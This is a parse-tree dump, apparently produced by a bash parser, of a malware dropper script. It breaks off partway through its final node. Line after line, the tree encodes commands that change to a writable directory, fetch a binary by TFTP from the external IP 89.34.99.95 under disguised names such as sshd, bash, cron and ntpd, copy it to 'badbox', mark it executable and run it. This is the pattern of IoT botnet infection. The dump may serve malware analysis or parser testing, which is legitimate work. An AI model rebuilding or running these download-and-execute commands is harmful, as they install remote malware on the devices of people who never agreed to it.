CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 169), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 132), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 120), word='89.34.99.95'),
    WordNode(lineno=4, pos=(121, 123), word='-c'),
    WordNode(lineno=4, pos=(124, 127), word='get'),
    WordNode(lineno=4, pos=(128, 132), word='ntpd'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(132, 133)),
  CommandNode(lineno=4, pos=(133, 149), parts=[
    WordNode(lineno=4, pos=(133, 136), word='cat'),
    WordNode(lineno=4, pos=(137, 141), word='ntpd'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(143, 149), word='badbox'), pos=(142, 149), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(149, 150)),
  CommandNode(lineno=4, pos=(150, 160), parts=[
    WordNode(lineno=4, pos=(150, 155), word='chmod'),
    WordNode(lineno=4, pos=(156, 158), word='+x'),
    WordNode(lineno=4, pos=(159, 160), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(160, 161)),
  CommandNode(lineno=4, pos=(161, 169), parts=[
    WordNode(lineno=4, pos=(161, 169), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(170, 290), parts=[
  CommandNode(lineno=5, pos=(170, 177), parts=[
    WordNode(lineno=5, pos=(170, 172), word='cd'),
    WordNode(lineno=5, pos=(173, 177), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(178, 180)),
  CommandNode(lineno=5, pos=(181, 192), parts=[
    WordNode(lineno=5, pos=(181, 183), word='cd'),
    WordNode(lineno=5, pos=(184, 192), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(193, 195)),
  CommandNode(lineno=5, pos=(196, 203), parts=[
    WordNode(lineno=5, pos=(196, 198), word='cd'),
    WordNode(lineno=5, pos=(199, 203), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(204, 206)),
  CommandNode(lineno=5, pos=(207, 215), parts=[
    WordNode(lineno=5, pos=(207, 209), word='cd'),
    WordNode(lineno=5, pos=(210, 215), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(216, 218)),
  CommandNode(lineno=5, pos=(219, 223), parts=[
    WordNode(lineno=5, pos=(219, 221), word='cd'),
    WordNode(lineno=5, pos=(222, 223), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(223, 224)),
  CommandNode(lineno=5, pos=(225, 253), parts=[
    WordNode(lineno=5, pos=(225, 229), word='tftp'),
    WordNode(lineno=5, pos=(230, 241), word='89.34.99.95'),
    WordNode(lineno=5, pos=(242, 244), word='-c'),
    WordNode(lineno=5, pos=(245, 248), word='get'),
    WordNode(lineno=5, pos=(249, 253), word='sshd'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(253, 254)),
  CommandNode(lineno=5, pos=(254, 270), parts=[
    WordNode(lineno=5, pos=(254, 257), word='cat'),
    WordNode(lineno=5, pos=(258, 262), word='sshd'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(264, 270), word='badbox'), pos=(263, 270), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(270, 271)),
  CommandNode(lineno=5, pos=(271, 281), parts=[
    WordNode(lineno=5, pos=(271, 276), word='chmod'),
    WordNode(lineno=5, pos=(277, 279), word='+x'),
    WordNode(lineno=5, pos=(280, 281), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(281, 282)),
  CommandNode(lineno=5, pos=(282, 290), parts=[
    WordNode(lineno=5, pos=(282, 290), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(291, 417), parts=[
  CommandNode(lineno=6, pos=(291, 298), parts=[
    WordNode(lineno=6, pos=(291, 293), word='cd'),
    WordNode(lineno=6, pos=(294, 298), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(299, 301)),
  CommandNode(lineno=6, pos=(302, 313), parts=[
    WordNode(lineno=6, pos=(302, 304), word='cd'),
    WordNode(lineno=6, pos=(305, 313), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(314, 316)),
  CommandNode(lineno=6, pos=(317, 324), parts=[
    WordNode(lineno=6, pos=(317, 319), word='cd'),
    WordNode(lineno=6, pos=(320, 324), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(325, 327)),
  CommandNode(lineno=6, pos=(328, 336), parts=[
    WordNode(lineno=6, pos=(328, 330), word='cd'),
    WordNode(lineno=6, pos=(331, 336), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(337, 339)),
  CommandNode(lineno=6, pos=(340, 344), parts=[
    WordNode(lineno=6, pos=(340, 342), word='cd'),
    WordNode(lineno=6, pos=(343, 344), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(344, 345)),
  CommandNode(lineno=6, pos=(346, 377), parts=[
    WordNode(lineno=6, pos=(346, 350), word='tftp'),
    WordNode(lineno=6, pos=(351, 362), word='89.34.99.95'),
    WordNode(lineno=6, pos=(363, 365), word='-c'),
    WordNode(lineno=6, pos=(366, 369), word='get'),
    WordNode(lineno=6, pos=(370, 377), word='openssh'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(377, 378)),
  CommandNode(lineno=6, pos=(378, 397), parts=[
    WordNode(lineno=6, pos=(378, 381), word='cat'),
    WordNode(lineno=6, pos=(382, 389), word='openssh'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(391, 397), word='badbox'), pos=(390, 397), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(397, 398)),
  CommandNode(lineno=6, pos=(398, 408), parts=[
    WordNode(lineno=6, pos=(398, 403), word='chmod'),
    WordNode(lineno=6, pos=(404, 406), word='+x'),
    WordNode(lineno=6, pos=(407, 408), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(408, 409)),
  CommandNode(lineno=6, pos=(409, 417), parts=[
    WordNode(lineno=6, pos=(409, 417), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(418, 538), parts=[
  CommandNode(lineno=7, pos=(418, 425), parts=[
    WordNode(lineno=7, pos=(418, 420), word='cd'),
    WordNode(lineno=7, pos=(421, 425), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(426, 428)),
  CommandNode(lineno=7, pos=(429, 440), parts=[
    WordNode(lineno=7, pos=(429, 431), word='cd'),
    WordNode(lineno=7, pos=(432, 440), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(441, 443)),
  CommandNode(lineno=7, pos=(444, 451), parts=[
    WordNode(lineno=7, pos=(444, 446), word='cd'),
    WordNode(lineno=7, pos=(447, 451), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(452, 454)),
  CommandNode(lineno=7, pos=(455, 463), parts=[
    WordNode(lineno=7, pos=(455, 457), word='cd'),
    WordNode(lineno=7, pos=(458, 463), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(464, 466)),
  CommandNode(lineno=7, pos=(467, 471), parts=[
    WordNode(lineno=7, pos=(467, 469), word='cd'),
    WordNode(lineno=7, pos=(470, 471), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(471, 472)),
  CommandNode(lineno=7, pos=(473, 501), parts=[
    WordNode(lineno=7, pos=(473, 477), word='tftp'),
    WordNode(lineno=7, pos=(478, 489), word='89.34.99.95'),
    WordNode(lineno=7, pos=(490, 492), word='-c'),
    WordNode(lineno=7, pos=(493, 496), word='get'),
    WordNode(lineno=7, pos=(497, 501), word='bash'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(501, 502)),
  CommandNode(lineno=7, pos=(502, 518), parts=[
    WordNode(lineno=7, pos=(502, 505), word='cat'),
    WordNode(lineno=7, pos=(506, 510), word='bash'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(512, 518), word='badbox'), pos=(511, 518), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(518, 519)),
  CommandNode(lineno=7, pos=(519, 529), parts=[
    WordNode(lineno=7, pos=(519, 524), word='chmod'),
    WordNode(lineno=7, pos=(525, 527), word='+x'),
    WordNode(lineno=7, pos=(528, 529), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(529, 530)),
  CommandNode(lineno=7, pos=(530, 538), parts=[
    WordNode(lineno=7, pos=(530, 538), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(539, 659), parts=[
  CommandNode(lineno=8, pos=(539, 546), parts=[
    WordNode(lineno=8, pos=(539, 541), word='cd'),
    WordNode(lineno=8, pos=(542, 546), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(547, 549)),
  CommandNode(lineno=8, pos=(550, 561), parts=[
    WordNode(lineno=8, pos=(550, 552), word='cd'),
    WordNode(lineno=8, pos=(553, 561), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(562, 564)),
  CommandNode(lineno=8, pos=(565, 572), parts=[
    WordNode(lineno=8, pos=(565, 567), word='cd'),
    WordNode(lineno=8, pos=(568, 572), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(573, 575)),
  CommandNode(lineno=8, pos=(576, 584), parts=[
    WordNode(lineno=8, pos=(576, 578), word='cd'),
    WordNode(lineno=8, pos=(579, 584), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(585, 587)),
  CommandNode(lineno=8, pos=(588, 592), parts=[
    WordNode(lineno=8, pos=(588, 590), word='cd'),
    WordNode(lineno=8, pos=(591, 592), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(592, 593)),
  CommandNode(lineno=8, pos=(594, 622), parts=[
    WordNode(lineno=8, pos=(594, 598), word='tftp'),
    WordNode(lineno=8, pos=(599, 610), word='89.34.99.95'),
    WordNode(lineno=8, pos=(611, 613), word='-c'),
    WordNode(lineno=8, pos=(614, 617), word='get'),
    WordNode(lineno=8, pos=(618, 622), word='tftp'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(622, 623)),
  CommandNode(lineno=8, pos=(623, 639), parts=[
    WordNode(lineno=8, pos=(623, 626), word='cat'),
    WordNode(lineno=8, pos=(627, 631), word='tftp'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(633, 639), word='badbox'), pos=(632, 639), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(639, 640)),
  CommandNode(lineno=8, pos=(640, 650), parts=[
    WordNode(lineno=8, pos=(640, 645), word='chmod'),
    WordNode(lineno=8, pos=(646, 648), word='+x'),
    WordNode(lineno=8, pos=(649, 650), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(650, 651)),
  CommandNode(lineno=8, pos=(651, 659), parts=[
    WordNode(lineno=8, pos=(651, 659), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(660, 780), parts=[
  CommandNode(lineno=9, pos=(660, 667), parts=[
    WordNode(lineno=9, pos=(660, 662), word='cd'),
    WordNode(lineno=9, pos=(663, 667), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(668, 670)),
  CommandNode(lineno=9, pos=(671, 682), parts=[
    WordNode(lineno=9, pos=(671, 673), word='cd'),
    WordNode(lineno=9, pos=(674, 682), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(683, 685)),
  CommandNode(lineno=9, pos=(686, 693), parts=[
    WordNode(lineno=9, pos=(686, 688), word='cd'),
    WordNode(lineno=9, pos=(689, 693), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(694, 696)),
  CommandNode(lineno=9, pos=(697, 705), parts=[
    WordNode(lineno=9, pos=(697, 699), word='cd'),
    WordNode(lineno=9, pos=(700, 705), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(706, 708)),
  CommandNode(lineno=9, pos=(709, 713), parts=[
    WordNode(lineno=9, pos=(709, 711), word='cd'),
    WordNode(lineno=9, pos=(712, 713), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(713, 714)),
  CommandNode(lineno=9, pos=(715, 743), parts=[
    WordNode(lineno=9, pos=(715, 719), word='tftp'),
    WordNode(lineno=9, pos=(720, 731), word='89.34.99.95'),
    WordNode(lineno=9, pos=(732, 734), word='-c'),
    WordNode(lineno=9, pos=(735, 738), word='get'),
    WordNode(lineno=9, pos=(739, 743), word='wget'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(743, 744)),
  CommandNode(lineno=9, pos=(744, 760), parts=[
    WordNode(lineno=9, pos=(744, 747), word='cat'),
    WordNode(lineno=9, pos=(748, 752), word='wget'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(754, 760), word='badbox'), pos=(753, 760), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(760, 761)),
  CommandNode(lineno=9, pos=(761, 771), parts=[
    WordNode(lineno=9, pos=(761, 766), word='chmod'),
    WordNode(lineno=9, pos=(767, 769), word='+x'),
    WordNode(lineno=9, pos=(770, 771), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(771, 772)),
  CommandNode(lineno=9, pos=(772, 780), parts=[
    WordNode(lineno=9, pos=(772, 780), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(781, 901), parts=[
  CommandNode(lineno=10, pos=(781, 788), parts=[
    WordNode(lineno=10, pos=(781, 783), word='cd'),
    WordNode(lineno=10, pos=(784, 788), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(789, 791)),
  CommandNode(lineno=10, pos=(792, 803), parts=[
    WordNode(lineno=10, pos=(792, 794), word='cd'),
    WordNode(lineno=10, pos=(795, 803), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(804, 806)),
  CommandNode(lineno=10, pos=(807, 814), parts=[
    WordNode(lineno=10, pos=(807, 809), word='cd'),
    WordNode(lineno=10, pos=(810, 814), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(815, 817)),
  CommandNode(lineno=10, pos=(818, 826), parts=[
    WordNode(lineno=10, pos=(818, 820), word='cd'),
    WordNode(lineno=10, pos=(821, 826), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(827, 829)),
  CommandNode(lineno=10, pos=(830, 834), parts=[
    WordNode(lineno=10, pos=(830, 832), word='cd'),
    WordNode(lineno=10, pos=(833, 834), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(834, 835)),
  CommandNode(lineno=10, pos=(836, 864), parts=[
    WordNode(lineno=10, pos=(836, 840), word='tftp'),
    WordNode(lineno=10, pos=(841, 852), word='89.34.99.95'),
    WordNode(lineno=10, pos=(853, 855), word='-c'),
    WordNode(lineno=10, pos=(856, 859), word='get'),
    WordNode(lineno=10, pos=(860, 864), word='cron'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(864, 865)),
  CommandNode(lineno=10, pos=(865, 881), parts=[
    WordNode(lineno=10, pos=(865, 868), word='cat'),
    WordNode(lineno=10, pos=(869, 873), word='cron'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(875, 881), word='badbox'), pos=(874, 881), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(881, 882)),
  CommandNode(lineno=10, pos=(882, 892), parts=[
    WordNode(lineno=10, pos=(882, 887), word='chmod'),
    WordNode(lineno=10, pos=(888, 890), word='+x'),
    WordNode(lineno=10, pos=(891, 892), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(892, 893)),
  CommandNode(lineno=10, pos=(893, 901), parts=[
    WordNode(lineno=10, pos=(893, 901), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(902, 1020), parts=[
  CommandNode(lineno=11, pos=(902, 909), parts=[
    WordNode(lineno=11, pos=(902, 904), word='cd'),
    WordNode(lineno=11, pos=(905, 909), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(910, 912)),
  CommandNode(lineno=11, pos=(913, 924), parts=[
    WordNode(lineno=11, pos=(913, 915), word='cd'),
    WordNode(lineno=11, pos=(916, 924), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(925, 927)),
  CommandNode(lineno=11, pos=(928, 935), parts=[
    WordNode(lineno=11, pos=(928, 930), word='cd'),
    WordNode(lineno=11, pos=(931, 935), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(936, 938)),
  CommandNode(lineno=11, pos=(939, 947), parts=[
    WordNode(lineno=11, pos=(939, 941), word='cd'),
    WordNode(lineno=11, pos=(942, 947), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(948, 950)),
  CommandNode(lineno=11, pos=(951, 955), parts=[
    WordNode(lineno=11, pos=(951, 953), word='cd'),
    WordNode(lineno=11, pos=(954, 955), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(955, 956)),
  CommandNode(lineno=11, pos=(957, 984), parts=[
    WordNode(lineno=11, pos=(957, 961), word='tftp'),
    WordNode(lineno=11, pos=(962, 973), word='89.34.99.95'),
    WordNode(lineno=11, pos=(974, 976), word='-c'),
    WordNode(lineno=11, pos=(977, 980), word='get'),
    WordNode(lineno=11, pos=(981, 984), word='ftp'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(984, 985)),
  CommandNode(lineno=11, pos=(985, 1000), parts=[
    WordNode(lineno=11, pos=(985, 988), word='cat'),
    WordNode(lineno=11, pos=(989, 992), word='ftp'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(994, 1000), word='badbox'), pos=(993, 1000), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1000, 1001)),
  CommandNode(lineno=11, pos=(1001, 1011), parts=[
    WordNode(lineno=11, pos=(1001, 1006), word='chmod'),
    WordNode(lineno=11, pos=(1007, 1009), word='+x'),
    WordNode(lineno=11, pos=(1010, 1011), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1011, 1012)),
  CommandNode(lineno=11, pos=(1012, 1020), parts=[
    WordNode(lineno=11, pos=(1012, 1020), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1021, 1141), parts=[
  CommandNode(lineno=12, pos=(1021, 1028), parts=[
    WordNode(lineno=12, pos=(1021, 1023), word='cd'),
    WordNode(lineno=12, pos=(1024, 1028), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1029, 1031)),
  CommandNode(lineno=12, pos=(1032, 1043), parts=[
    WordNode(lineno=12, pos=(1032, 1034), word='cd'),
    WordNode(lineno=12, pos=(1035, 1043), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1044, 1046)),
  CommandNode(lineno=12, pos=(1047, 1054), parts=[
    WordNode(lineno=12, pos=(1047, 1049), word='cd'),
    WordNode(lineno=12, pos=(1050, 1054), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1055, 1057)),
  CommandNode(lineno=12, pos=(1058, 1066), parts=[
    WordNode(lineno=12, pos=(1058, 1060), word='cd'),
    WordNode(lineno=12, pos=(1061, 1066), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1067, 1069)),
  CommandNode(lineno=12, pos=(1070, 1074), parts=[
    WordNode(lineno=12, pos=(1070, 1072), word='cd'),
    WordNode(lineno=12, pos=(1073, 1074), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1074, 1075)),
  CommandNode(lineno=12, pos=(1076, 1104), parts=[
    WordNode(lineno=12, pos=(1076, 1080), word='tftp'),
    WordNode(lineno=12, pos=(1081, 1092), word='89.34.99.95'),
    WordNode(lineno=12, pos=(1093, 1095), word='-c'),
    WordNode(lineno=12, pos=(1096, 1099), word='get'),
    WordNode(lineno=12, pos=(1100, 1104), word='pftp'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1104, 1105)),
  CommandNode(lineno=12, pos=(1105, 1121), parts=[
    WordNode(lineno=12, pos=(1105, 1108), word='cat'),
    WordNode(lineno=12, pos=(1109, 1113), word='pftp'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1115, 1121), word='badbox'), pos=(1114, 1121), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1121, 1122)),
  CommandNode(lineno=12, pos=(1122, 1132), parts=[
    WordNode(lineno=12, pos=(1122, 1127), word='chmod'),
    WordNode(lineno=12, pos=(1128, 1130), word='+x'),
    WordNode(lineno=12, pos=(1131, 1132), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1132, 1133)),
  CommandNode(lineno=12, pos=(1133, 1141), parts=[
    WordNode(lineno=12, pos=(1133, 1141), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1142, 1262), parts=[
  CommandNode(lineno=13, pos=(1142, 1149), parts=[
    WordNode(lineno=13, pos=(1142, 1144), word='cd'),
    WordNode(lineno=13, pos=(1145, 1149), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1150, 1152)),
  CommandNode(lineno=13, pos=(1153, 1164), parts=[
    WordNode(lineno=13, pos=(1153, 1155), word='cd'),
    WordNode(lineno=13, pos=(1156, 1164), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1165, 1167)),
  CommandNode(lineno=13, pos=(1168, 1175), parts=[
    WordNode(lineno=13, pos=(1168, 1170), word='cd'),
    WordNode(lineno=13, pos=(1171, 1175), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1176, 1178)),
  CommandNode(lineno=13, pos=(1179, 1187), parts=[
    WordNode(lineno=13, pos=(1179, 1181), word='cd'),
    WordNode(lineno=13, pos=(1182, 1187), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1188, 1190)),
  CommandNode(lineno=13, pos=(1191, 1195), parts=[
    WordNode(lineno=13, pos=(1191, 1193), word='cd'),
    WordNode(lineno=13, pos=(1194, 1195), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1195, 1196)),
  CommandNode(lineno=13, pos=(1197, 1225), parts=[
    WordNode(lineno=13, pos=(1197, 1201), word='tftp'),
    WordNode(lineno=13, pos=(1202, 1213), word='89.34.99.95'),
    WordNode(lineno=13, pos=(1214, 1216), word='-c'),
    WordNode(lineno=13, pos=(1217, 1220), word='get'),
    WordNode(lineno=13, pos=(1221, 1225), word='dtpg'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1225, 1226)),
  CommandNode(lineno=13, pos=(1226, 1242), parts=[
    WordNode(lineno=13, pos=(1226, 1229), word='cat'),
    WordNode(lineno=13, pos=(1230, 1234), word='dtpg'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1236, 1242), word='badbox'), pos=(1235, 1242), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1242, 1243)),
  CommandNode(lineno=13, pos=(1243, 1253), parts=[
    WordNode(lineno=13, pos=(1243, 1248), word='chmod'),
    WordNode(lineno=13, pos=(1249, 1251), word='+x'),
    WordNode(lineno=13, pos=(1252, 1253), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1253, 1254)),
  CommandNode(lineno=13, pos=(1254, 1262), parts=[
    WordNode(lineno=13, pos=(1254, 1262), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1263, 1385), parts=[
  CommandNode(lineno=14, pos=(1263, 1270), parts=[
    WordNode(lineno=14, pos=(1263, 1265), word='cd'),
    WordNode(lineno=14, pos=(1266, 1270), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1271, 1273)),
  CommandNode(lineno=14, pos=(1274, 1285), parts=[
    WordNode(lineno=14, pos=(1274, 1276), word='cd'),
    WordNode(lineno=14, pos=(1277, 1285), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1286, 1288)),
  CommandNode(lineno=14, pos=(1289, 1296), parts=[
    WordNode(lineno=14, pos=(1289, 1291), word='cd'),
    WordNode(lineno=14, pos=(1292, 1296), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1297, 1299)),
  CommandNode(lineno=14, pos=(1300, 1308), parts=[
    WordNode(lineno=14, pos=(1300, 1302), word='cd'),
    WordNode(lineno=14, pos=(1303, 1308), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1309, 1311)),
  CommandNode(lineno=14, pos=(1312, 1316), parts=[
    WordNode(lineno=14, pos=(1312, 1314), word='cd'),
    WordNode(lineno=14, pos=(1315, 1316), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1316, 1317)),
  CommandNode(lineno=14, pos=(1318, 1347), parts=[
    WordNode(lineno=14, pos=(1318, 1322), word='tftp'),
    WordNode(lineno=14, pos=(1323, 1334), word='89.34.99.95'),
    WordNode(lineno=14, pos=(1335, 1337), word='-c'),
    WordNode(lineno=14, pos=(1338, 1341), word='get'),
    WordNode(lineno=14, pos=(1342, 1347), word='crons'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1347, 1348)),
  CommandNode(lineno=14, pos=(1348, 1365), parts=[
    WordNode(lineno=14, pos=(1348, 1351), word='cat'),
    WordNode(lineno=14, pos=(1352, 1357), word='crons'),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1359, 1365), word='badbox'), pos=(1358, 1365), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1365, 1366)),
  CommandNode(lineno=14, pos=(1366, 1376), parts=[
    WordNode(lineno=14, pos=(1366, 1371), word='chmod'),
    WordNode(lineno=14, pos=(1372, 1374), word='+x'),
    WordNode(lineno=14, pos=(1375, 1376), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1376, 1377)),
  CommandNode(lineno=14, pos=(1377, 1385), parts=[
    WordNode(lineno=14, pos=(1377, 1385), word='./badbox'),
  ]),
])
ListNode(lineno=15, pos=(1386, 1506), parts=[
  CommandNode(lineno=15, pos=(1386, 1393), parts=[
    WordNode(lineno=15, pos=(1386, 1388), word='cd'),
    WordNode(lineno=15, pos=(1389, 1393), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1394, 1396)),
  CommandNode(lineno=15, pos=(1397, 1408), parts=[
    WordNode(lineno=15, pos=(1397, 1399), word='cd'),
    WordNode(lineno=15, pos=(1400, 1408), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1409, 1411)),
  CommandNode(lineno=15, pos=(1412, 1419), parts=[
    WordNode(lineno=15, pos=(1412, 1414), word='cd'),
    WordNode(lineno=15, pos=(1415, 1419), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1420, 1422)),
  CommandNode(lineno=15, pos=(1423, 1431), parts=[
    WordNode(lineno=15, pos=(1423, 1425), word='cd'),
    WordNode(lineno=15, pos=(1426, 1431), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1432, 1434)),
  CommandNode(lineno=15, pos=(1435, 1439), parts=[
    WordNode(lineno=15, pos=(1435, 1437), word='cd'),
    WordNode(lineno=15, pos=(1438, 1439), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1439, 1440)),
  CommandNode(lineno=15, pos=(1441, 1469), parts=[
    WordNode(lineno=15, pos=(1441, 1445), word='tftp'),
    WordNode(lineno=15, pos=(1446, 1457), word='89.34.99.95'),
    WordNode(lineno=15, pos=(1458, 1460), word='-c'),
    WordNode(lineno=15, pos=(1461, 1464), word='get'),
    WordNode(lineno=15, pos=(1465, 1469), word='ttpd'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1469, 1470)),
  CommandNode(lineno=15, pos=(1470, 1486), parts=[
    WordNode(lineno=15, pos=(1470, 1473), word='cat'),
    WordNode(lineno=15, pos=(1474, 1478), word='ttpd'),
    RedirectNode(lineno=15, output=
      WordNode(lineno=15, pos=(1480, 1486), word='badbox'), pos=(1479, 1486), type='>'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1486, 1487)),
  CommandNode(lineno=15, pos=(1487, 1497), parts=[
    WordNode(lineno=15, pos=(1487, 1492), word='chmod'),
    WordNode(lineno=15, pos=(1493, 1495), word='+x'),
    WordNode(lineno=15, pos=(1496, 1497), word='*'),
  ]),
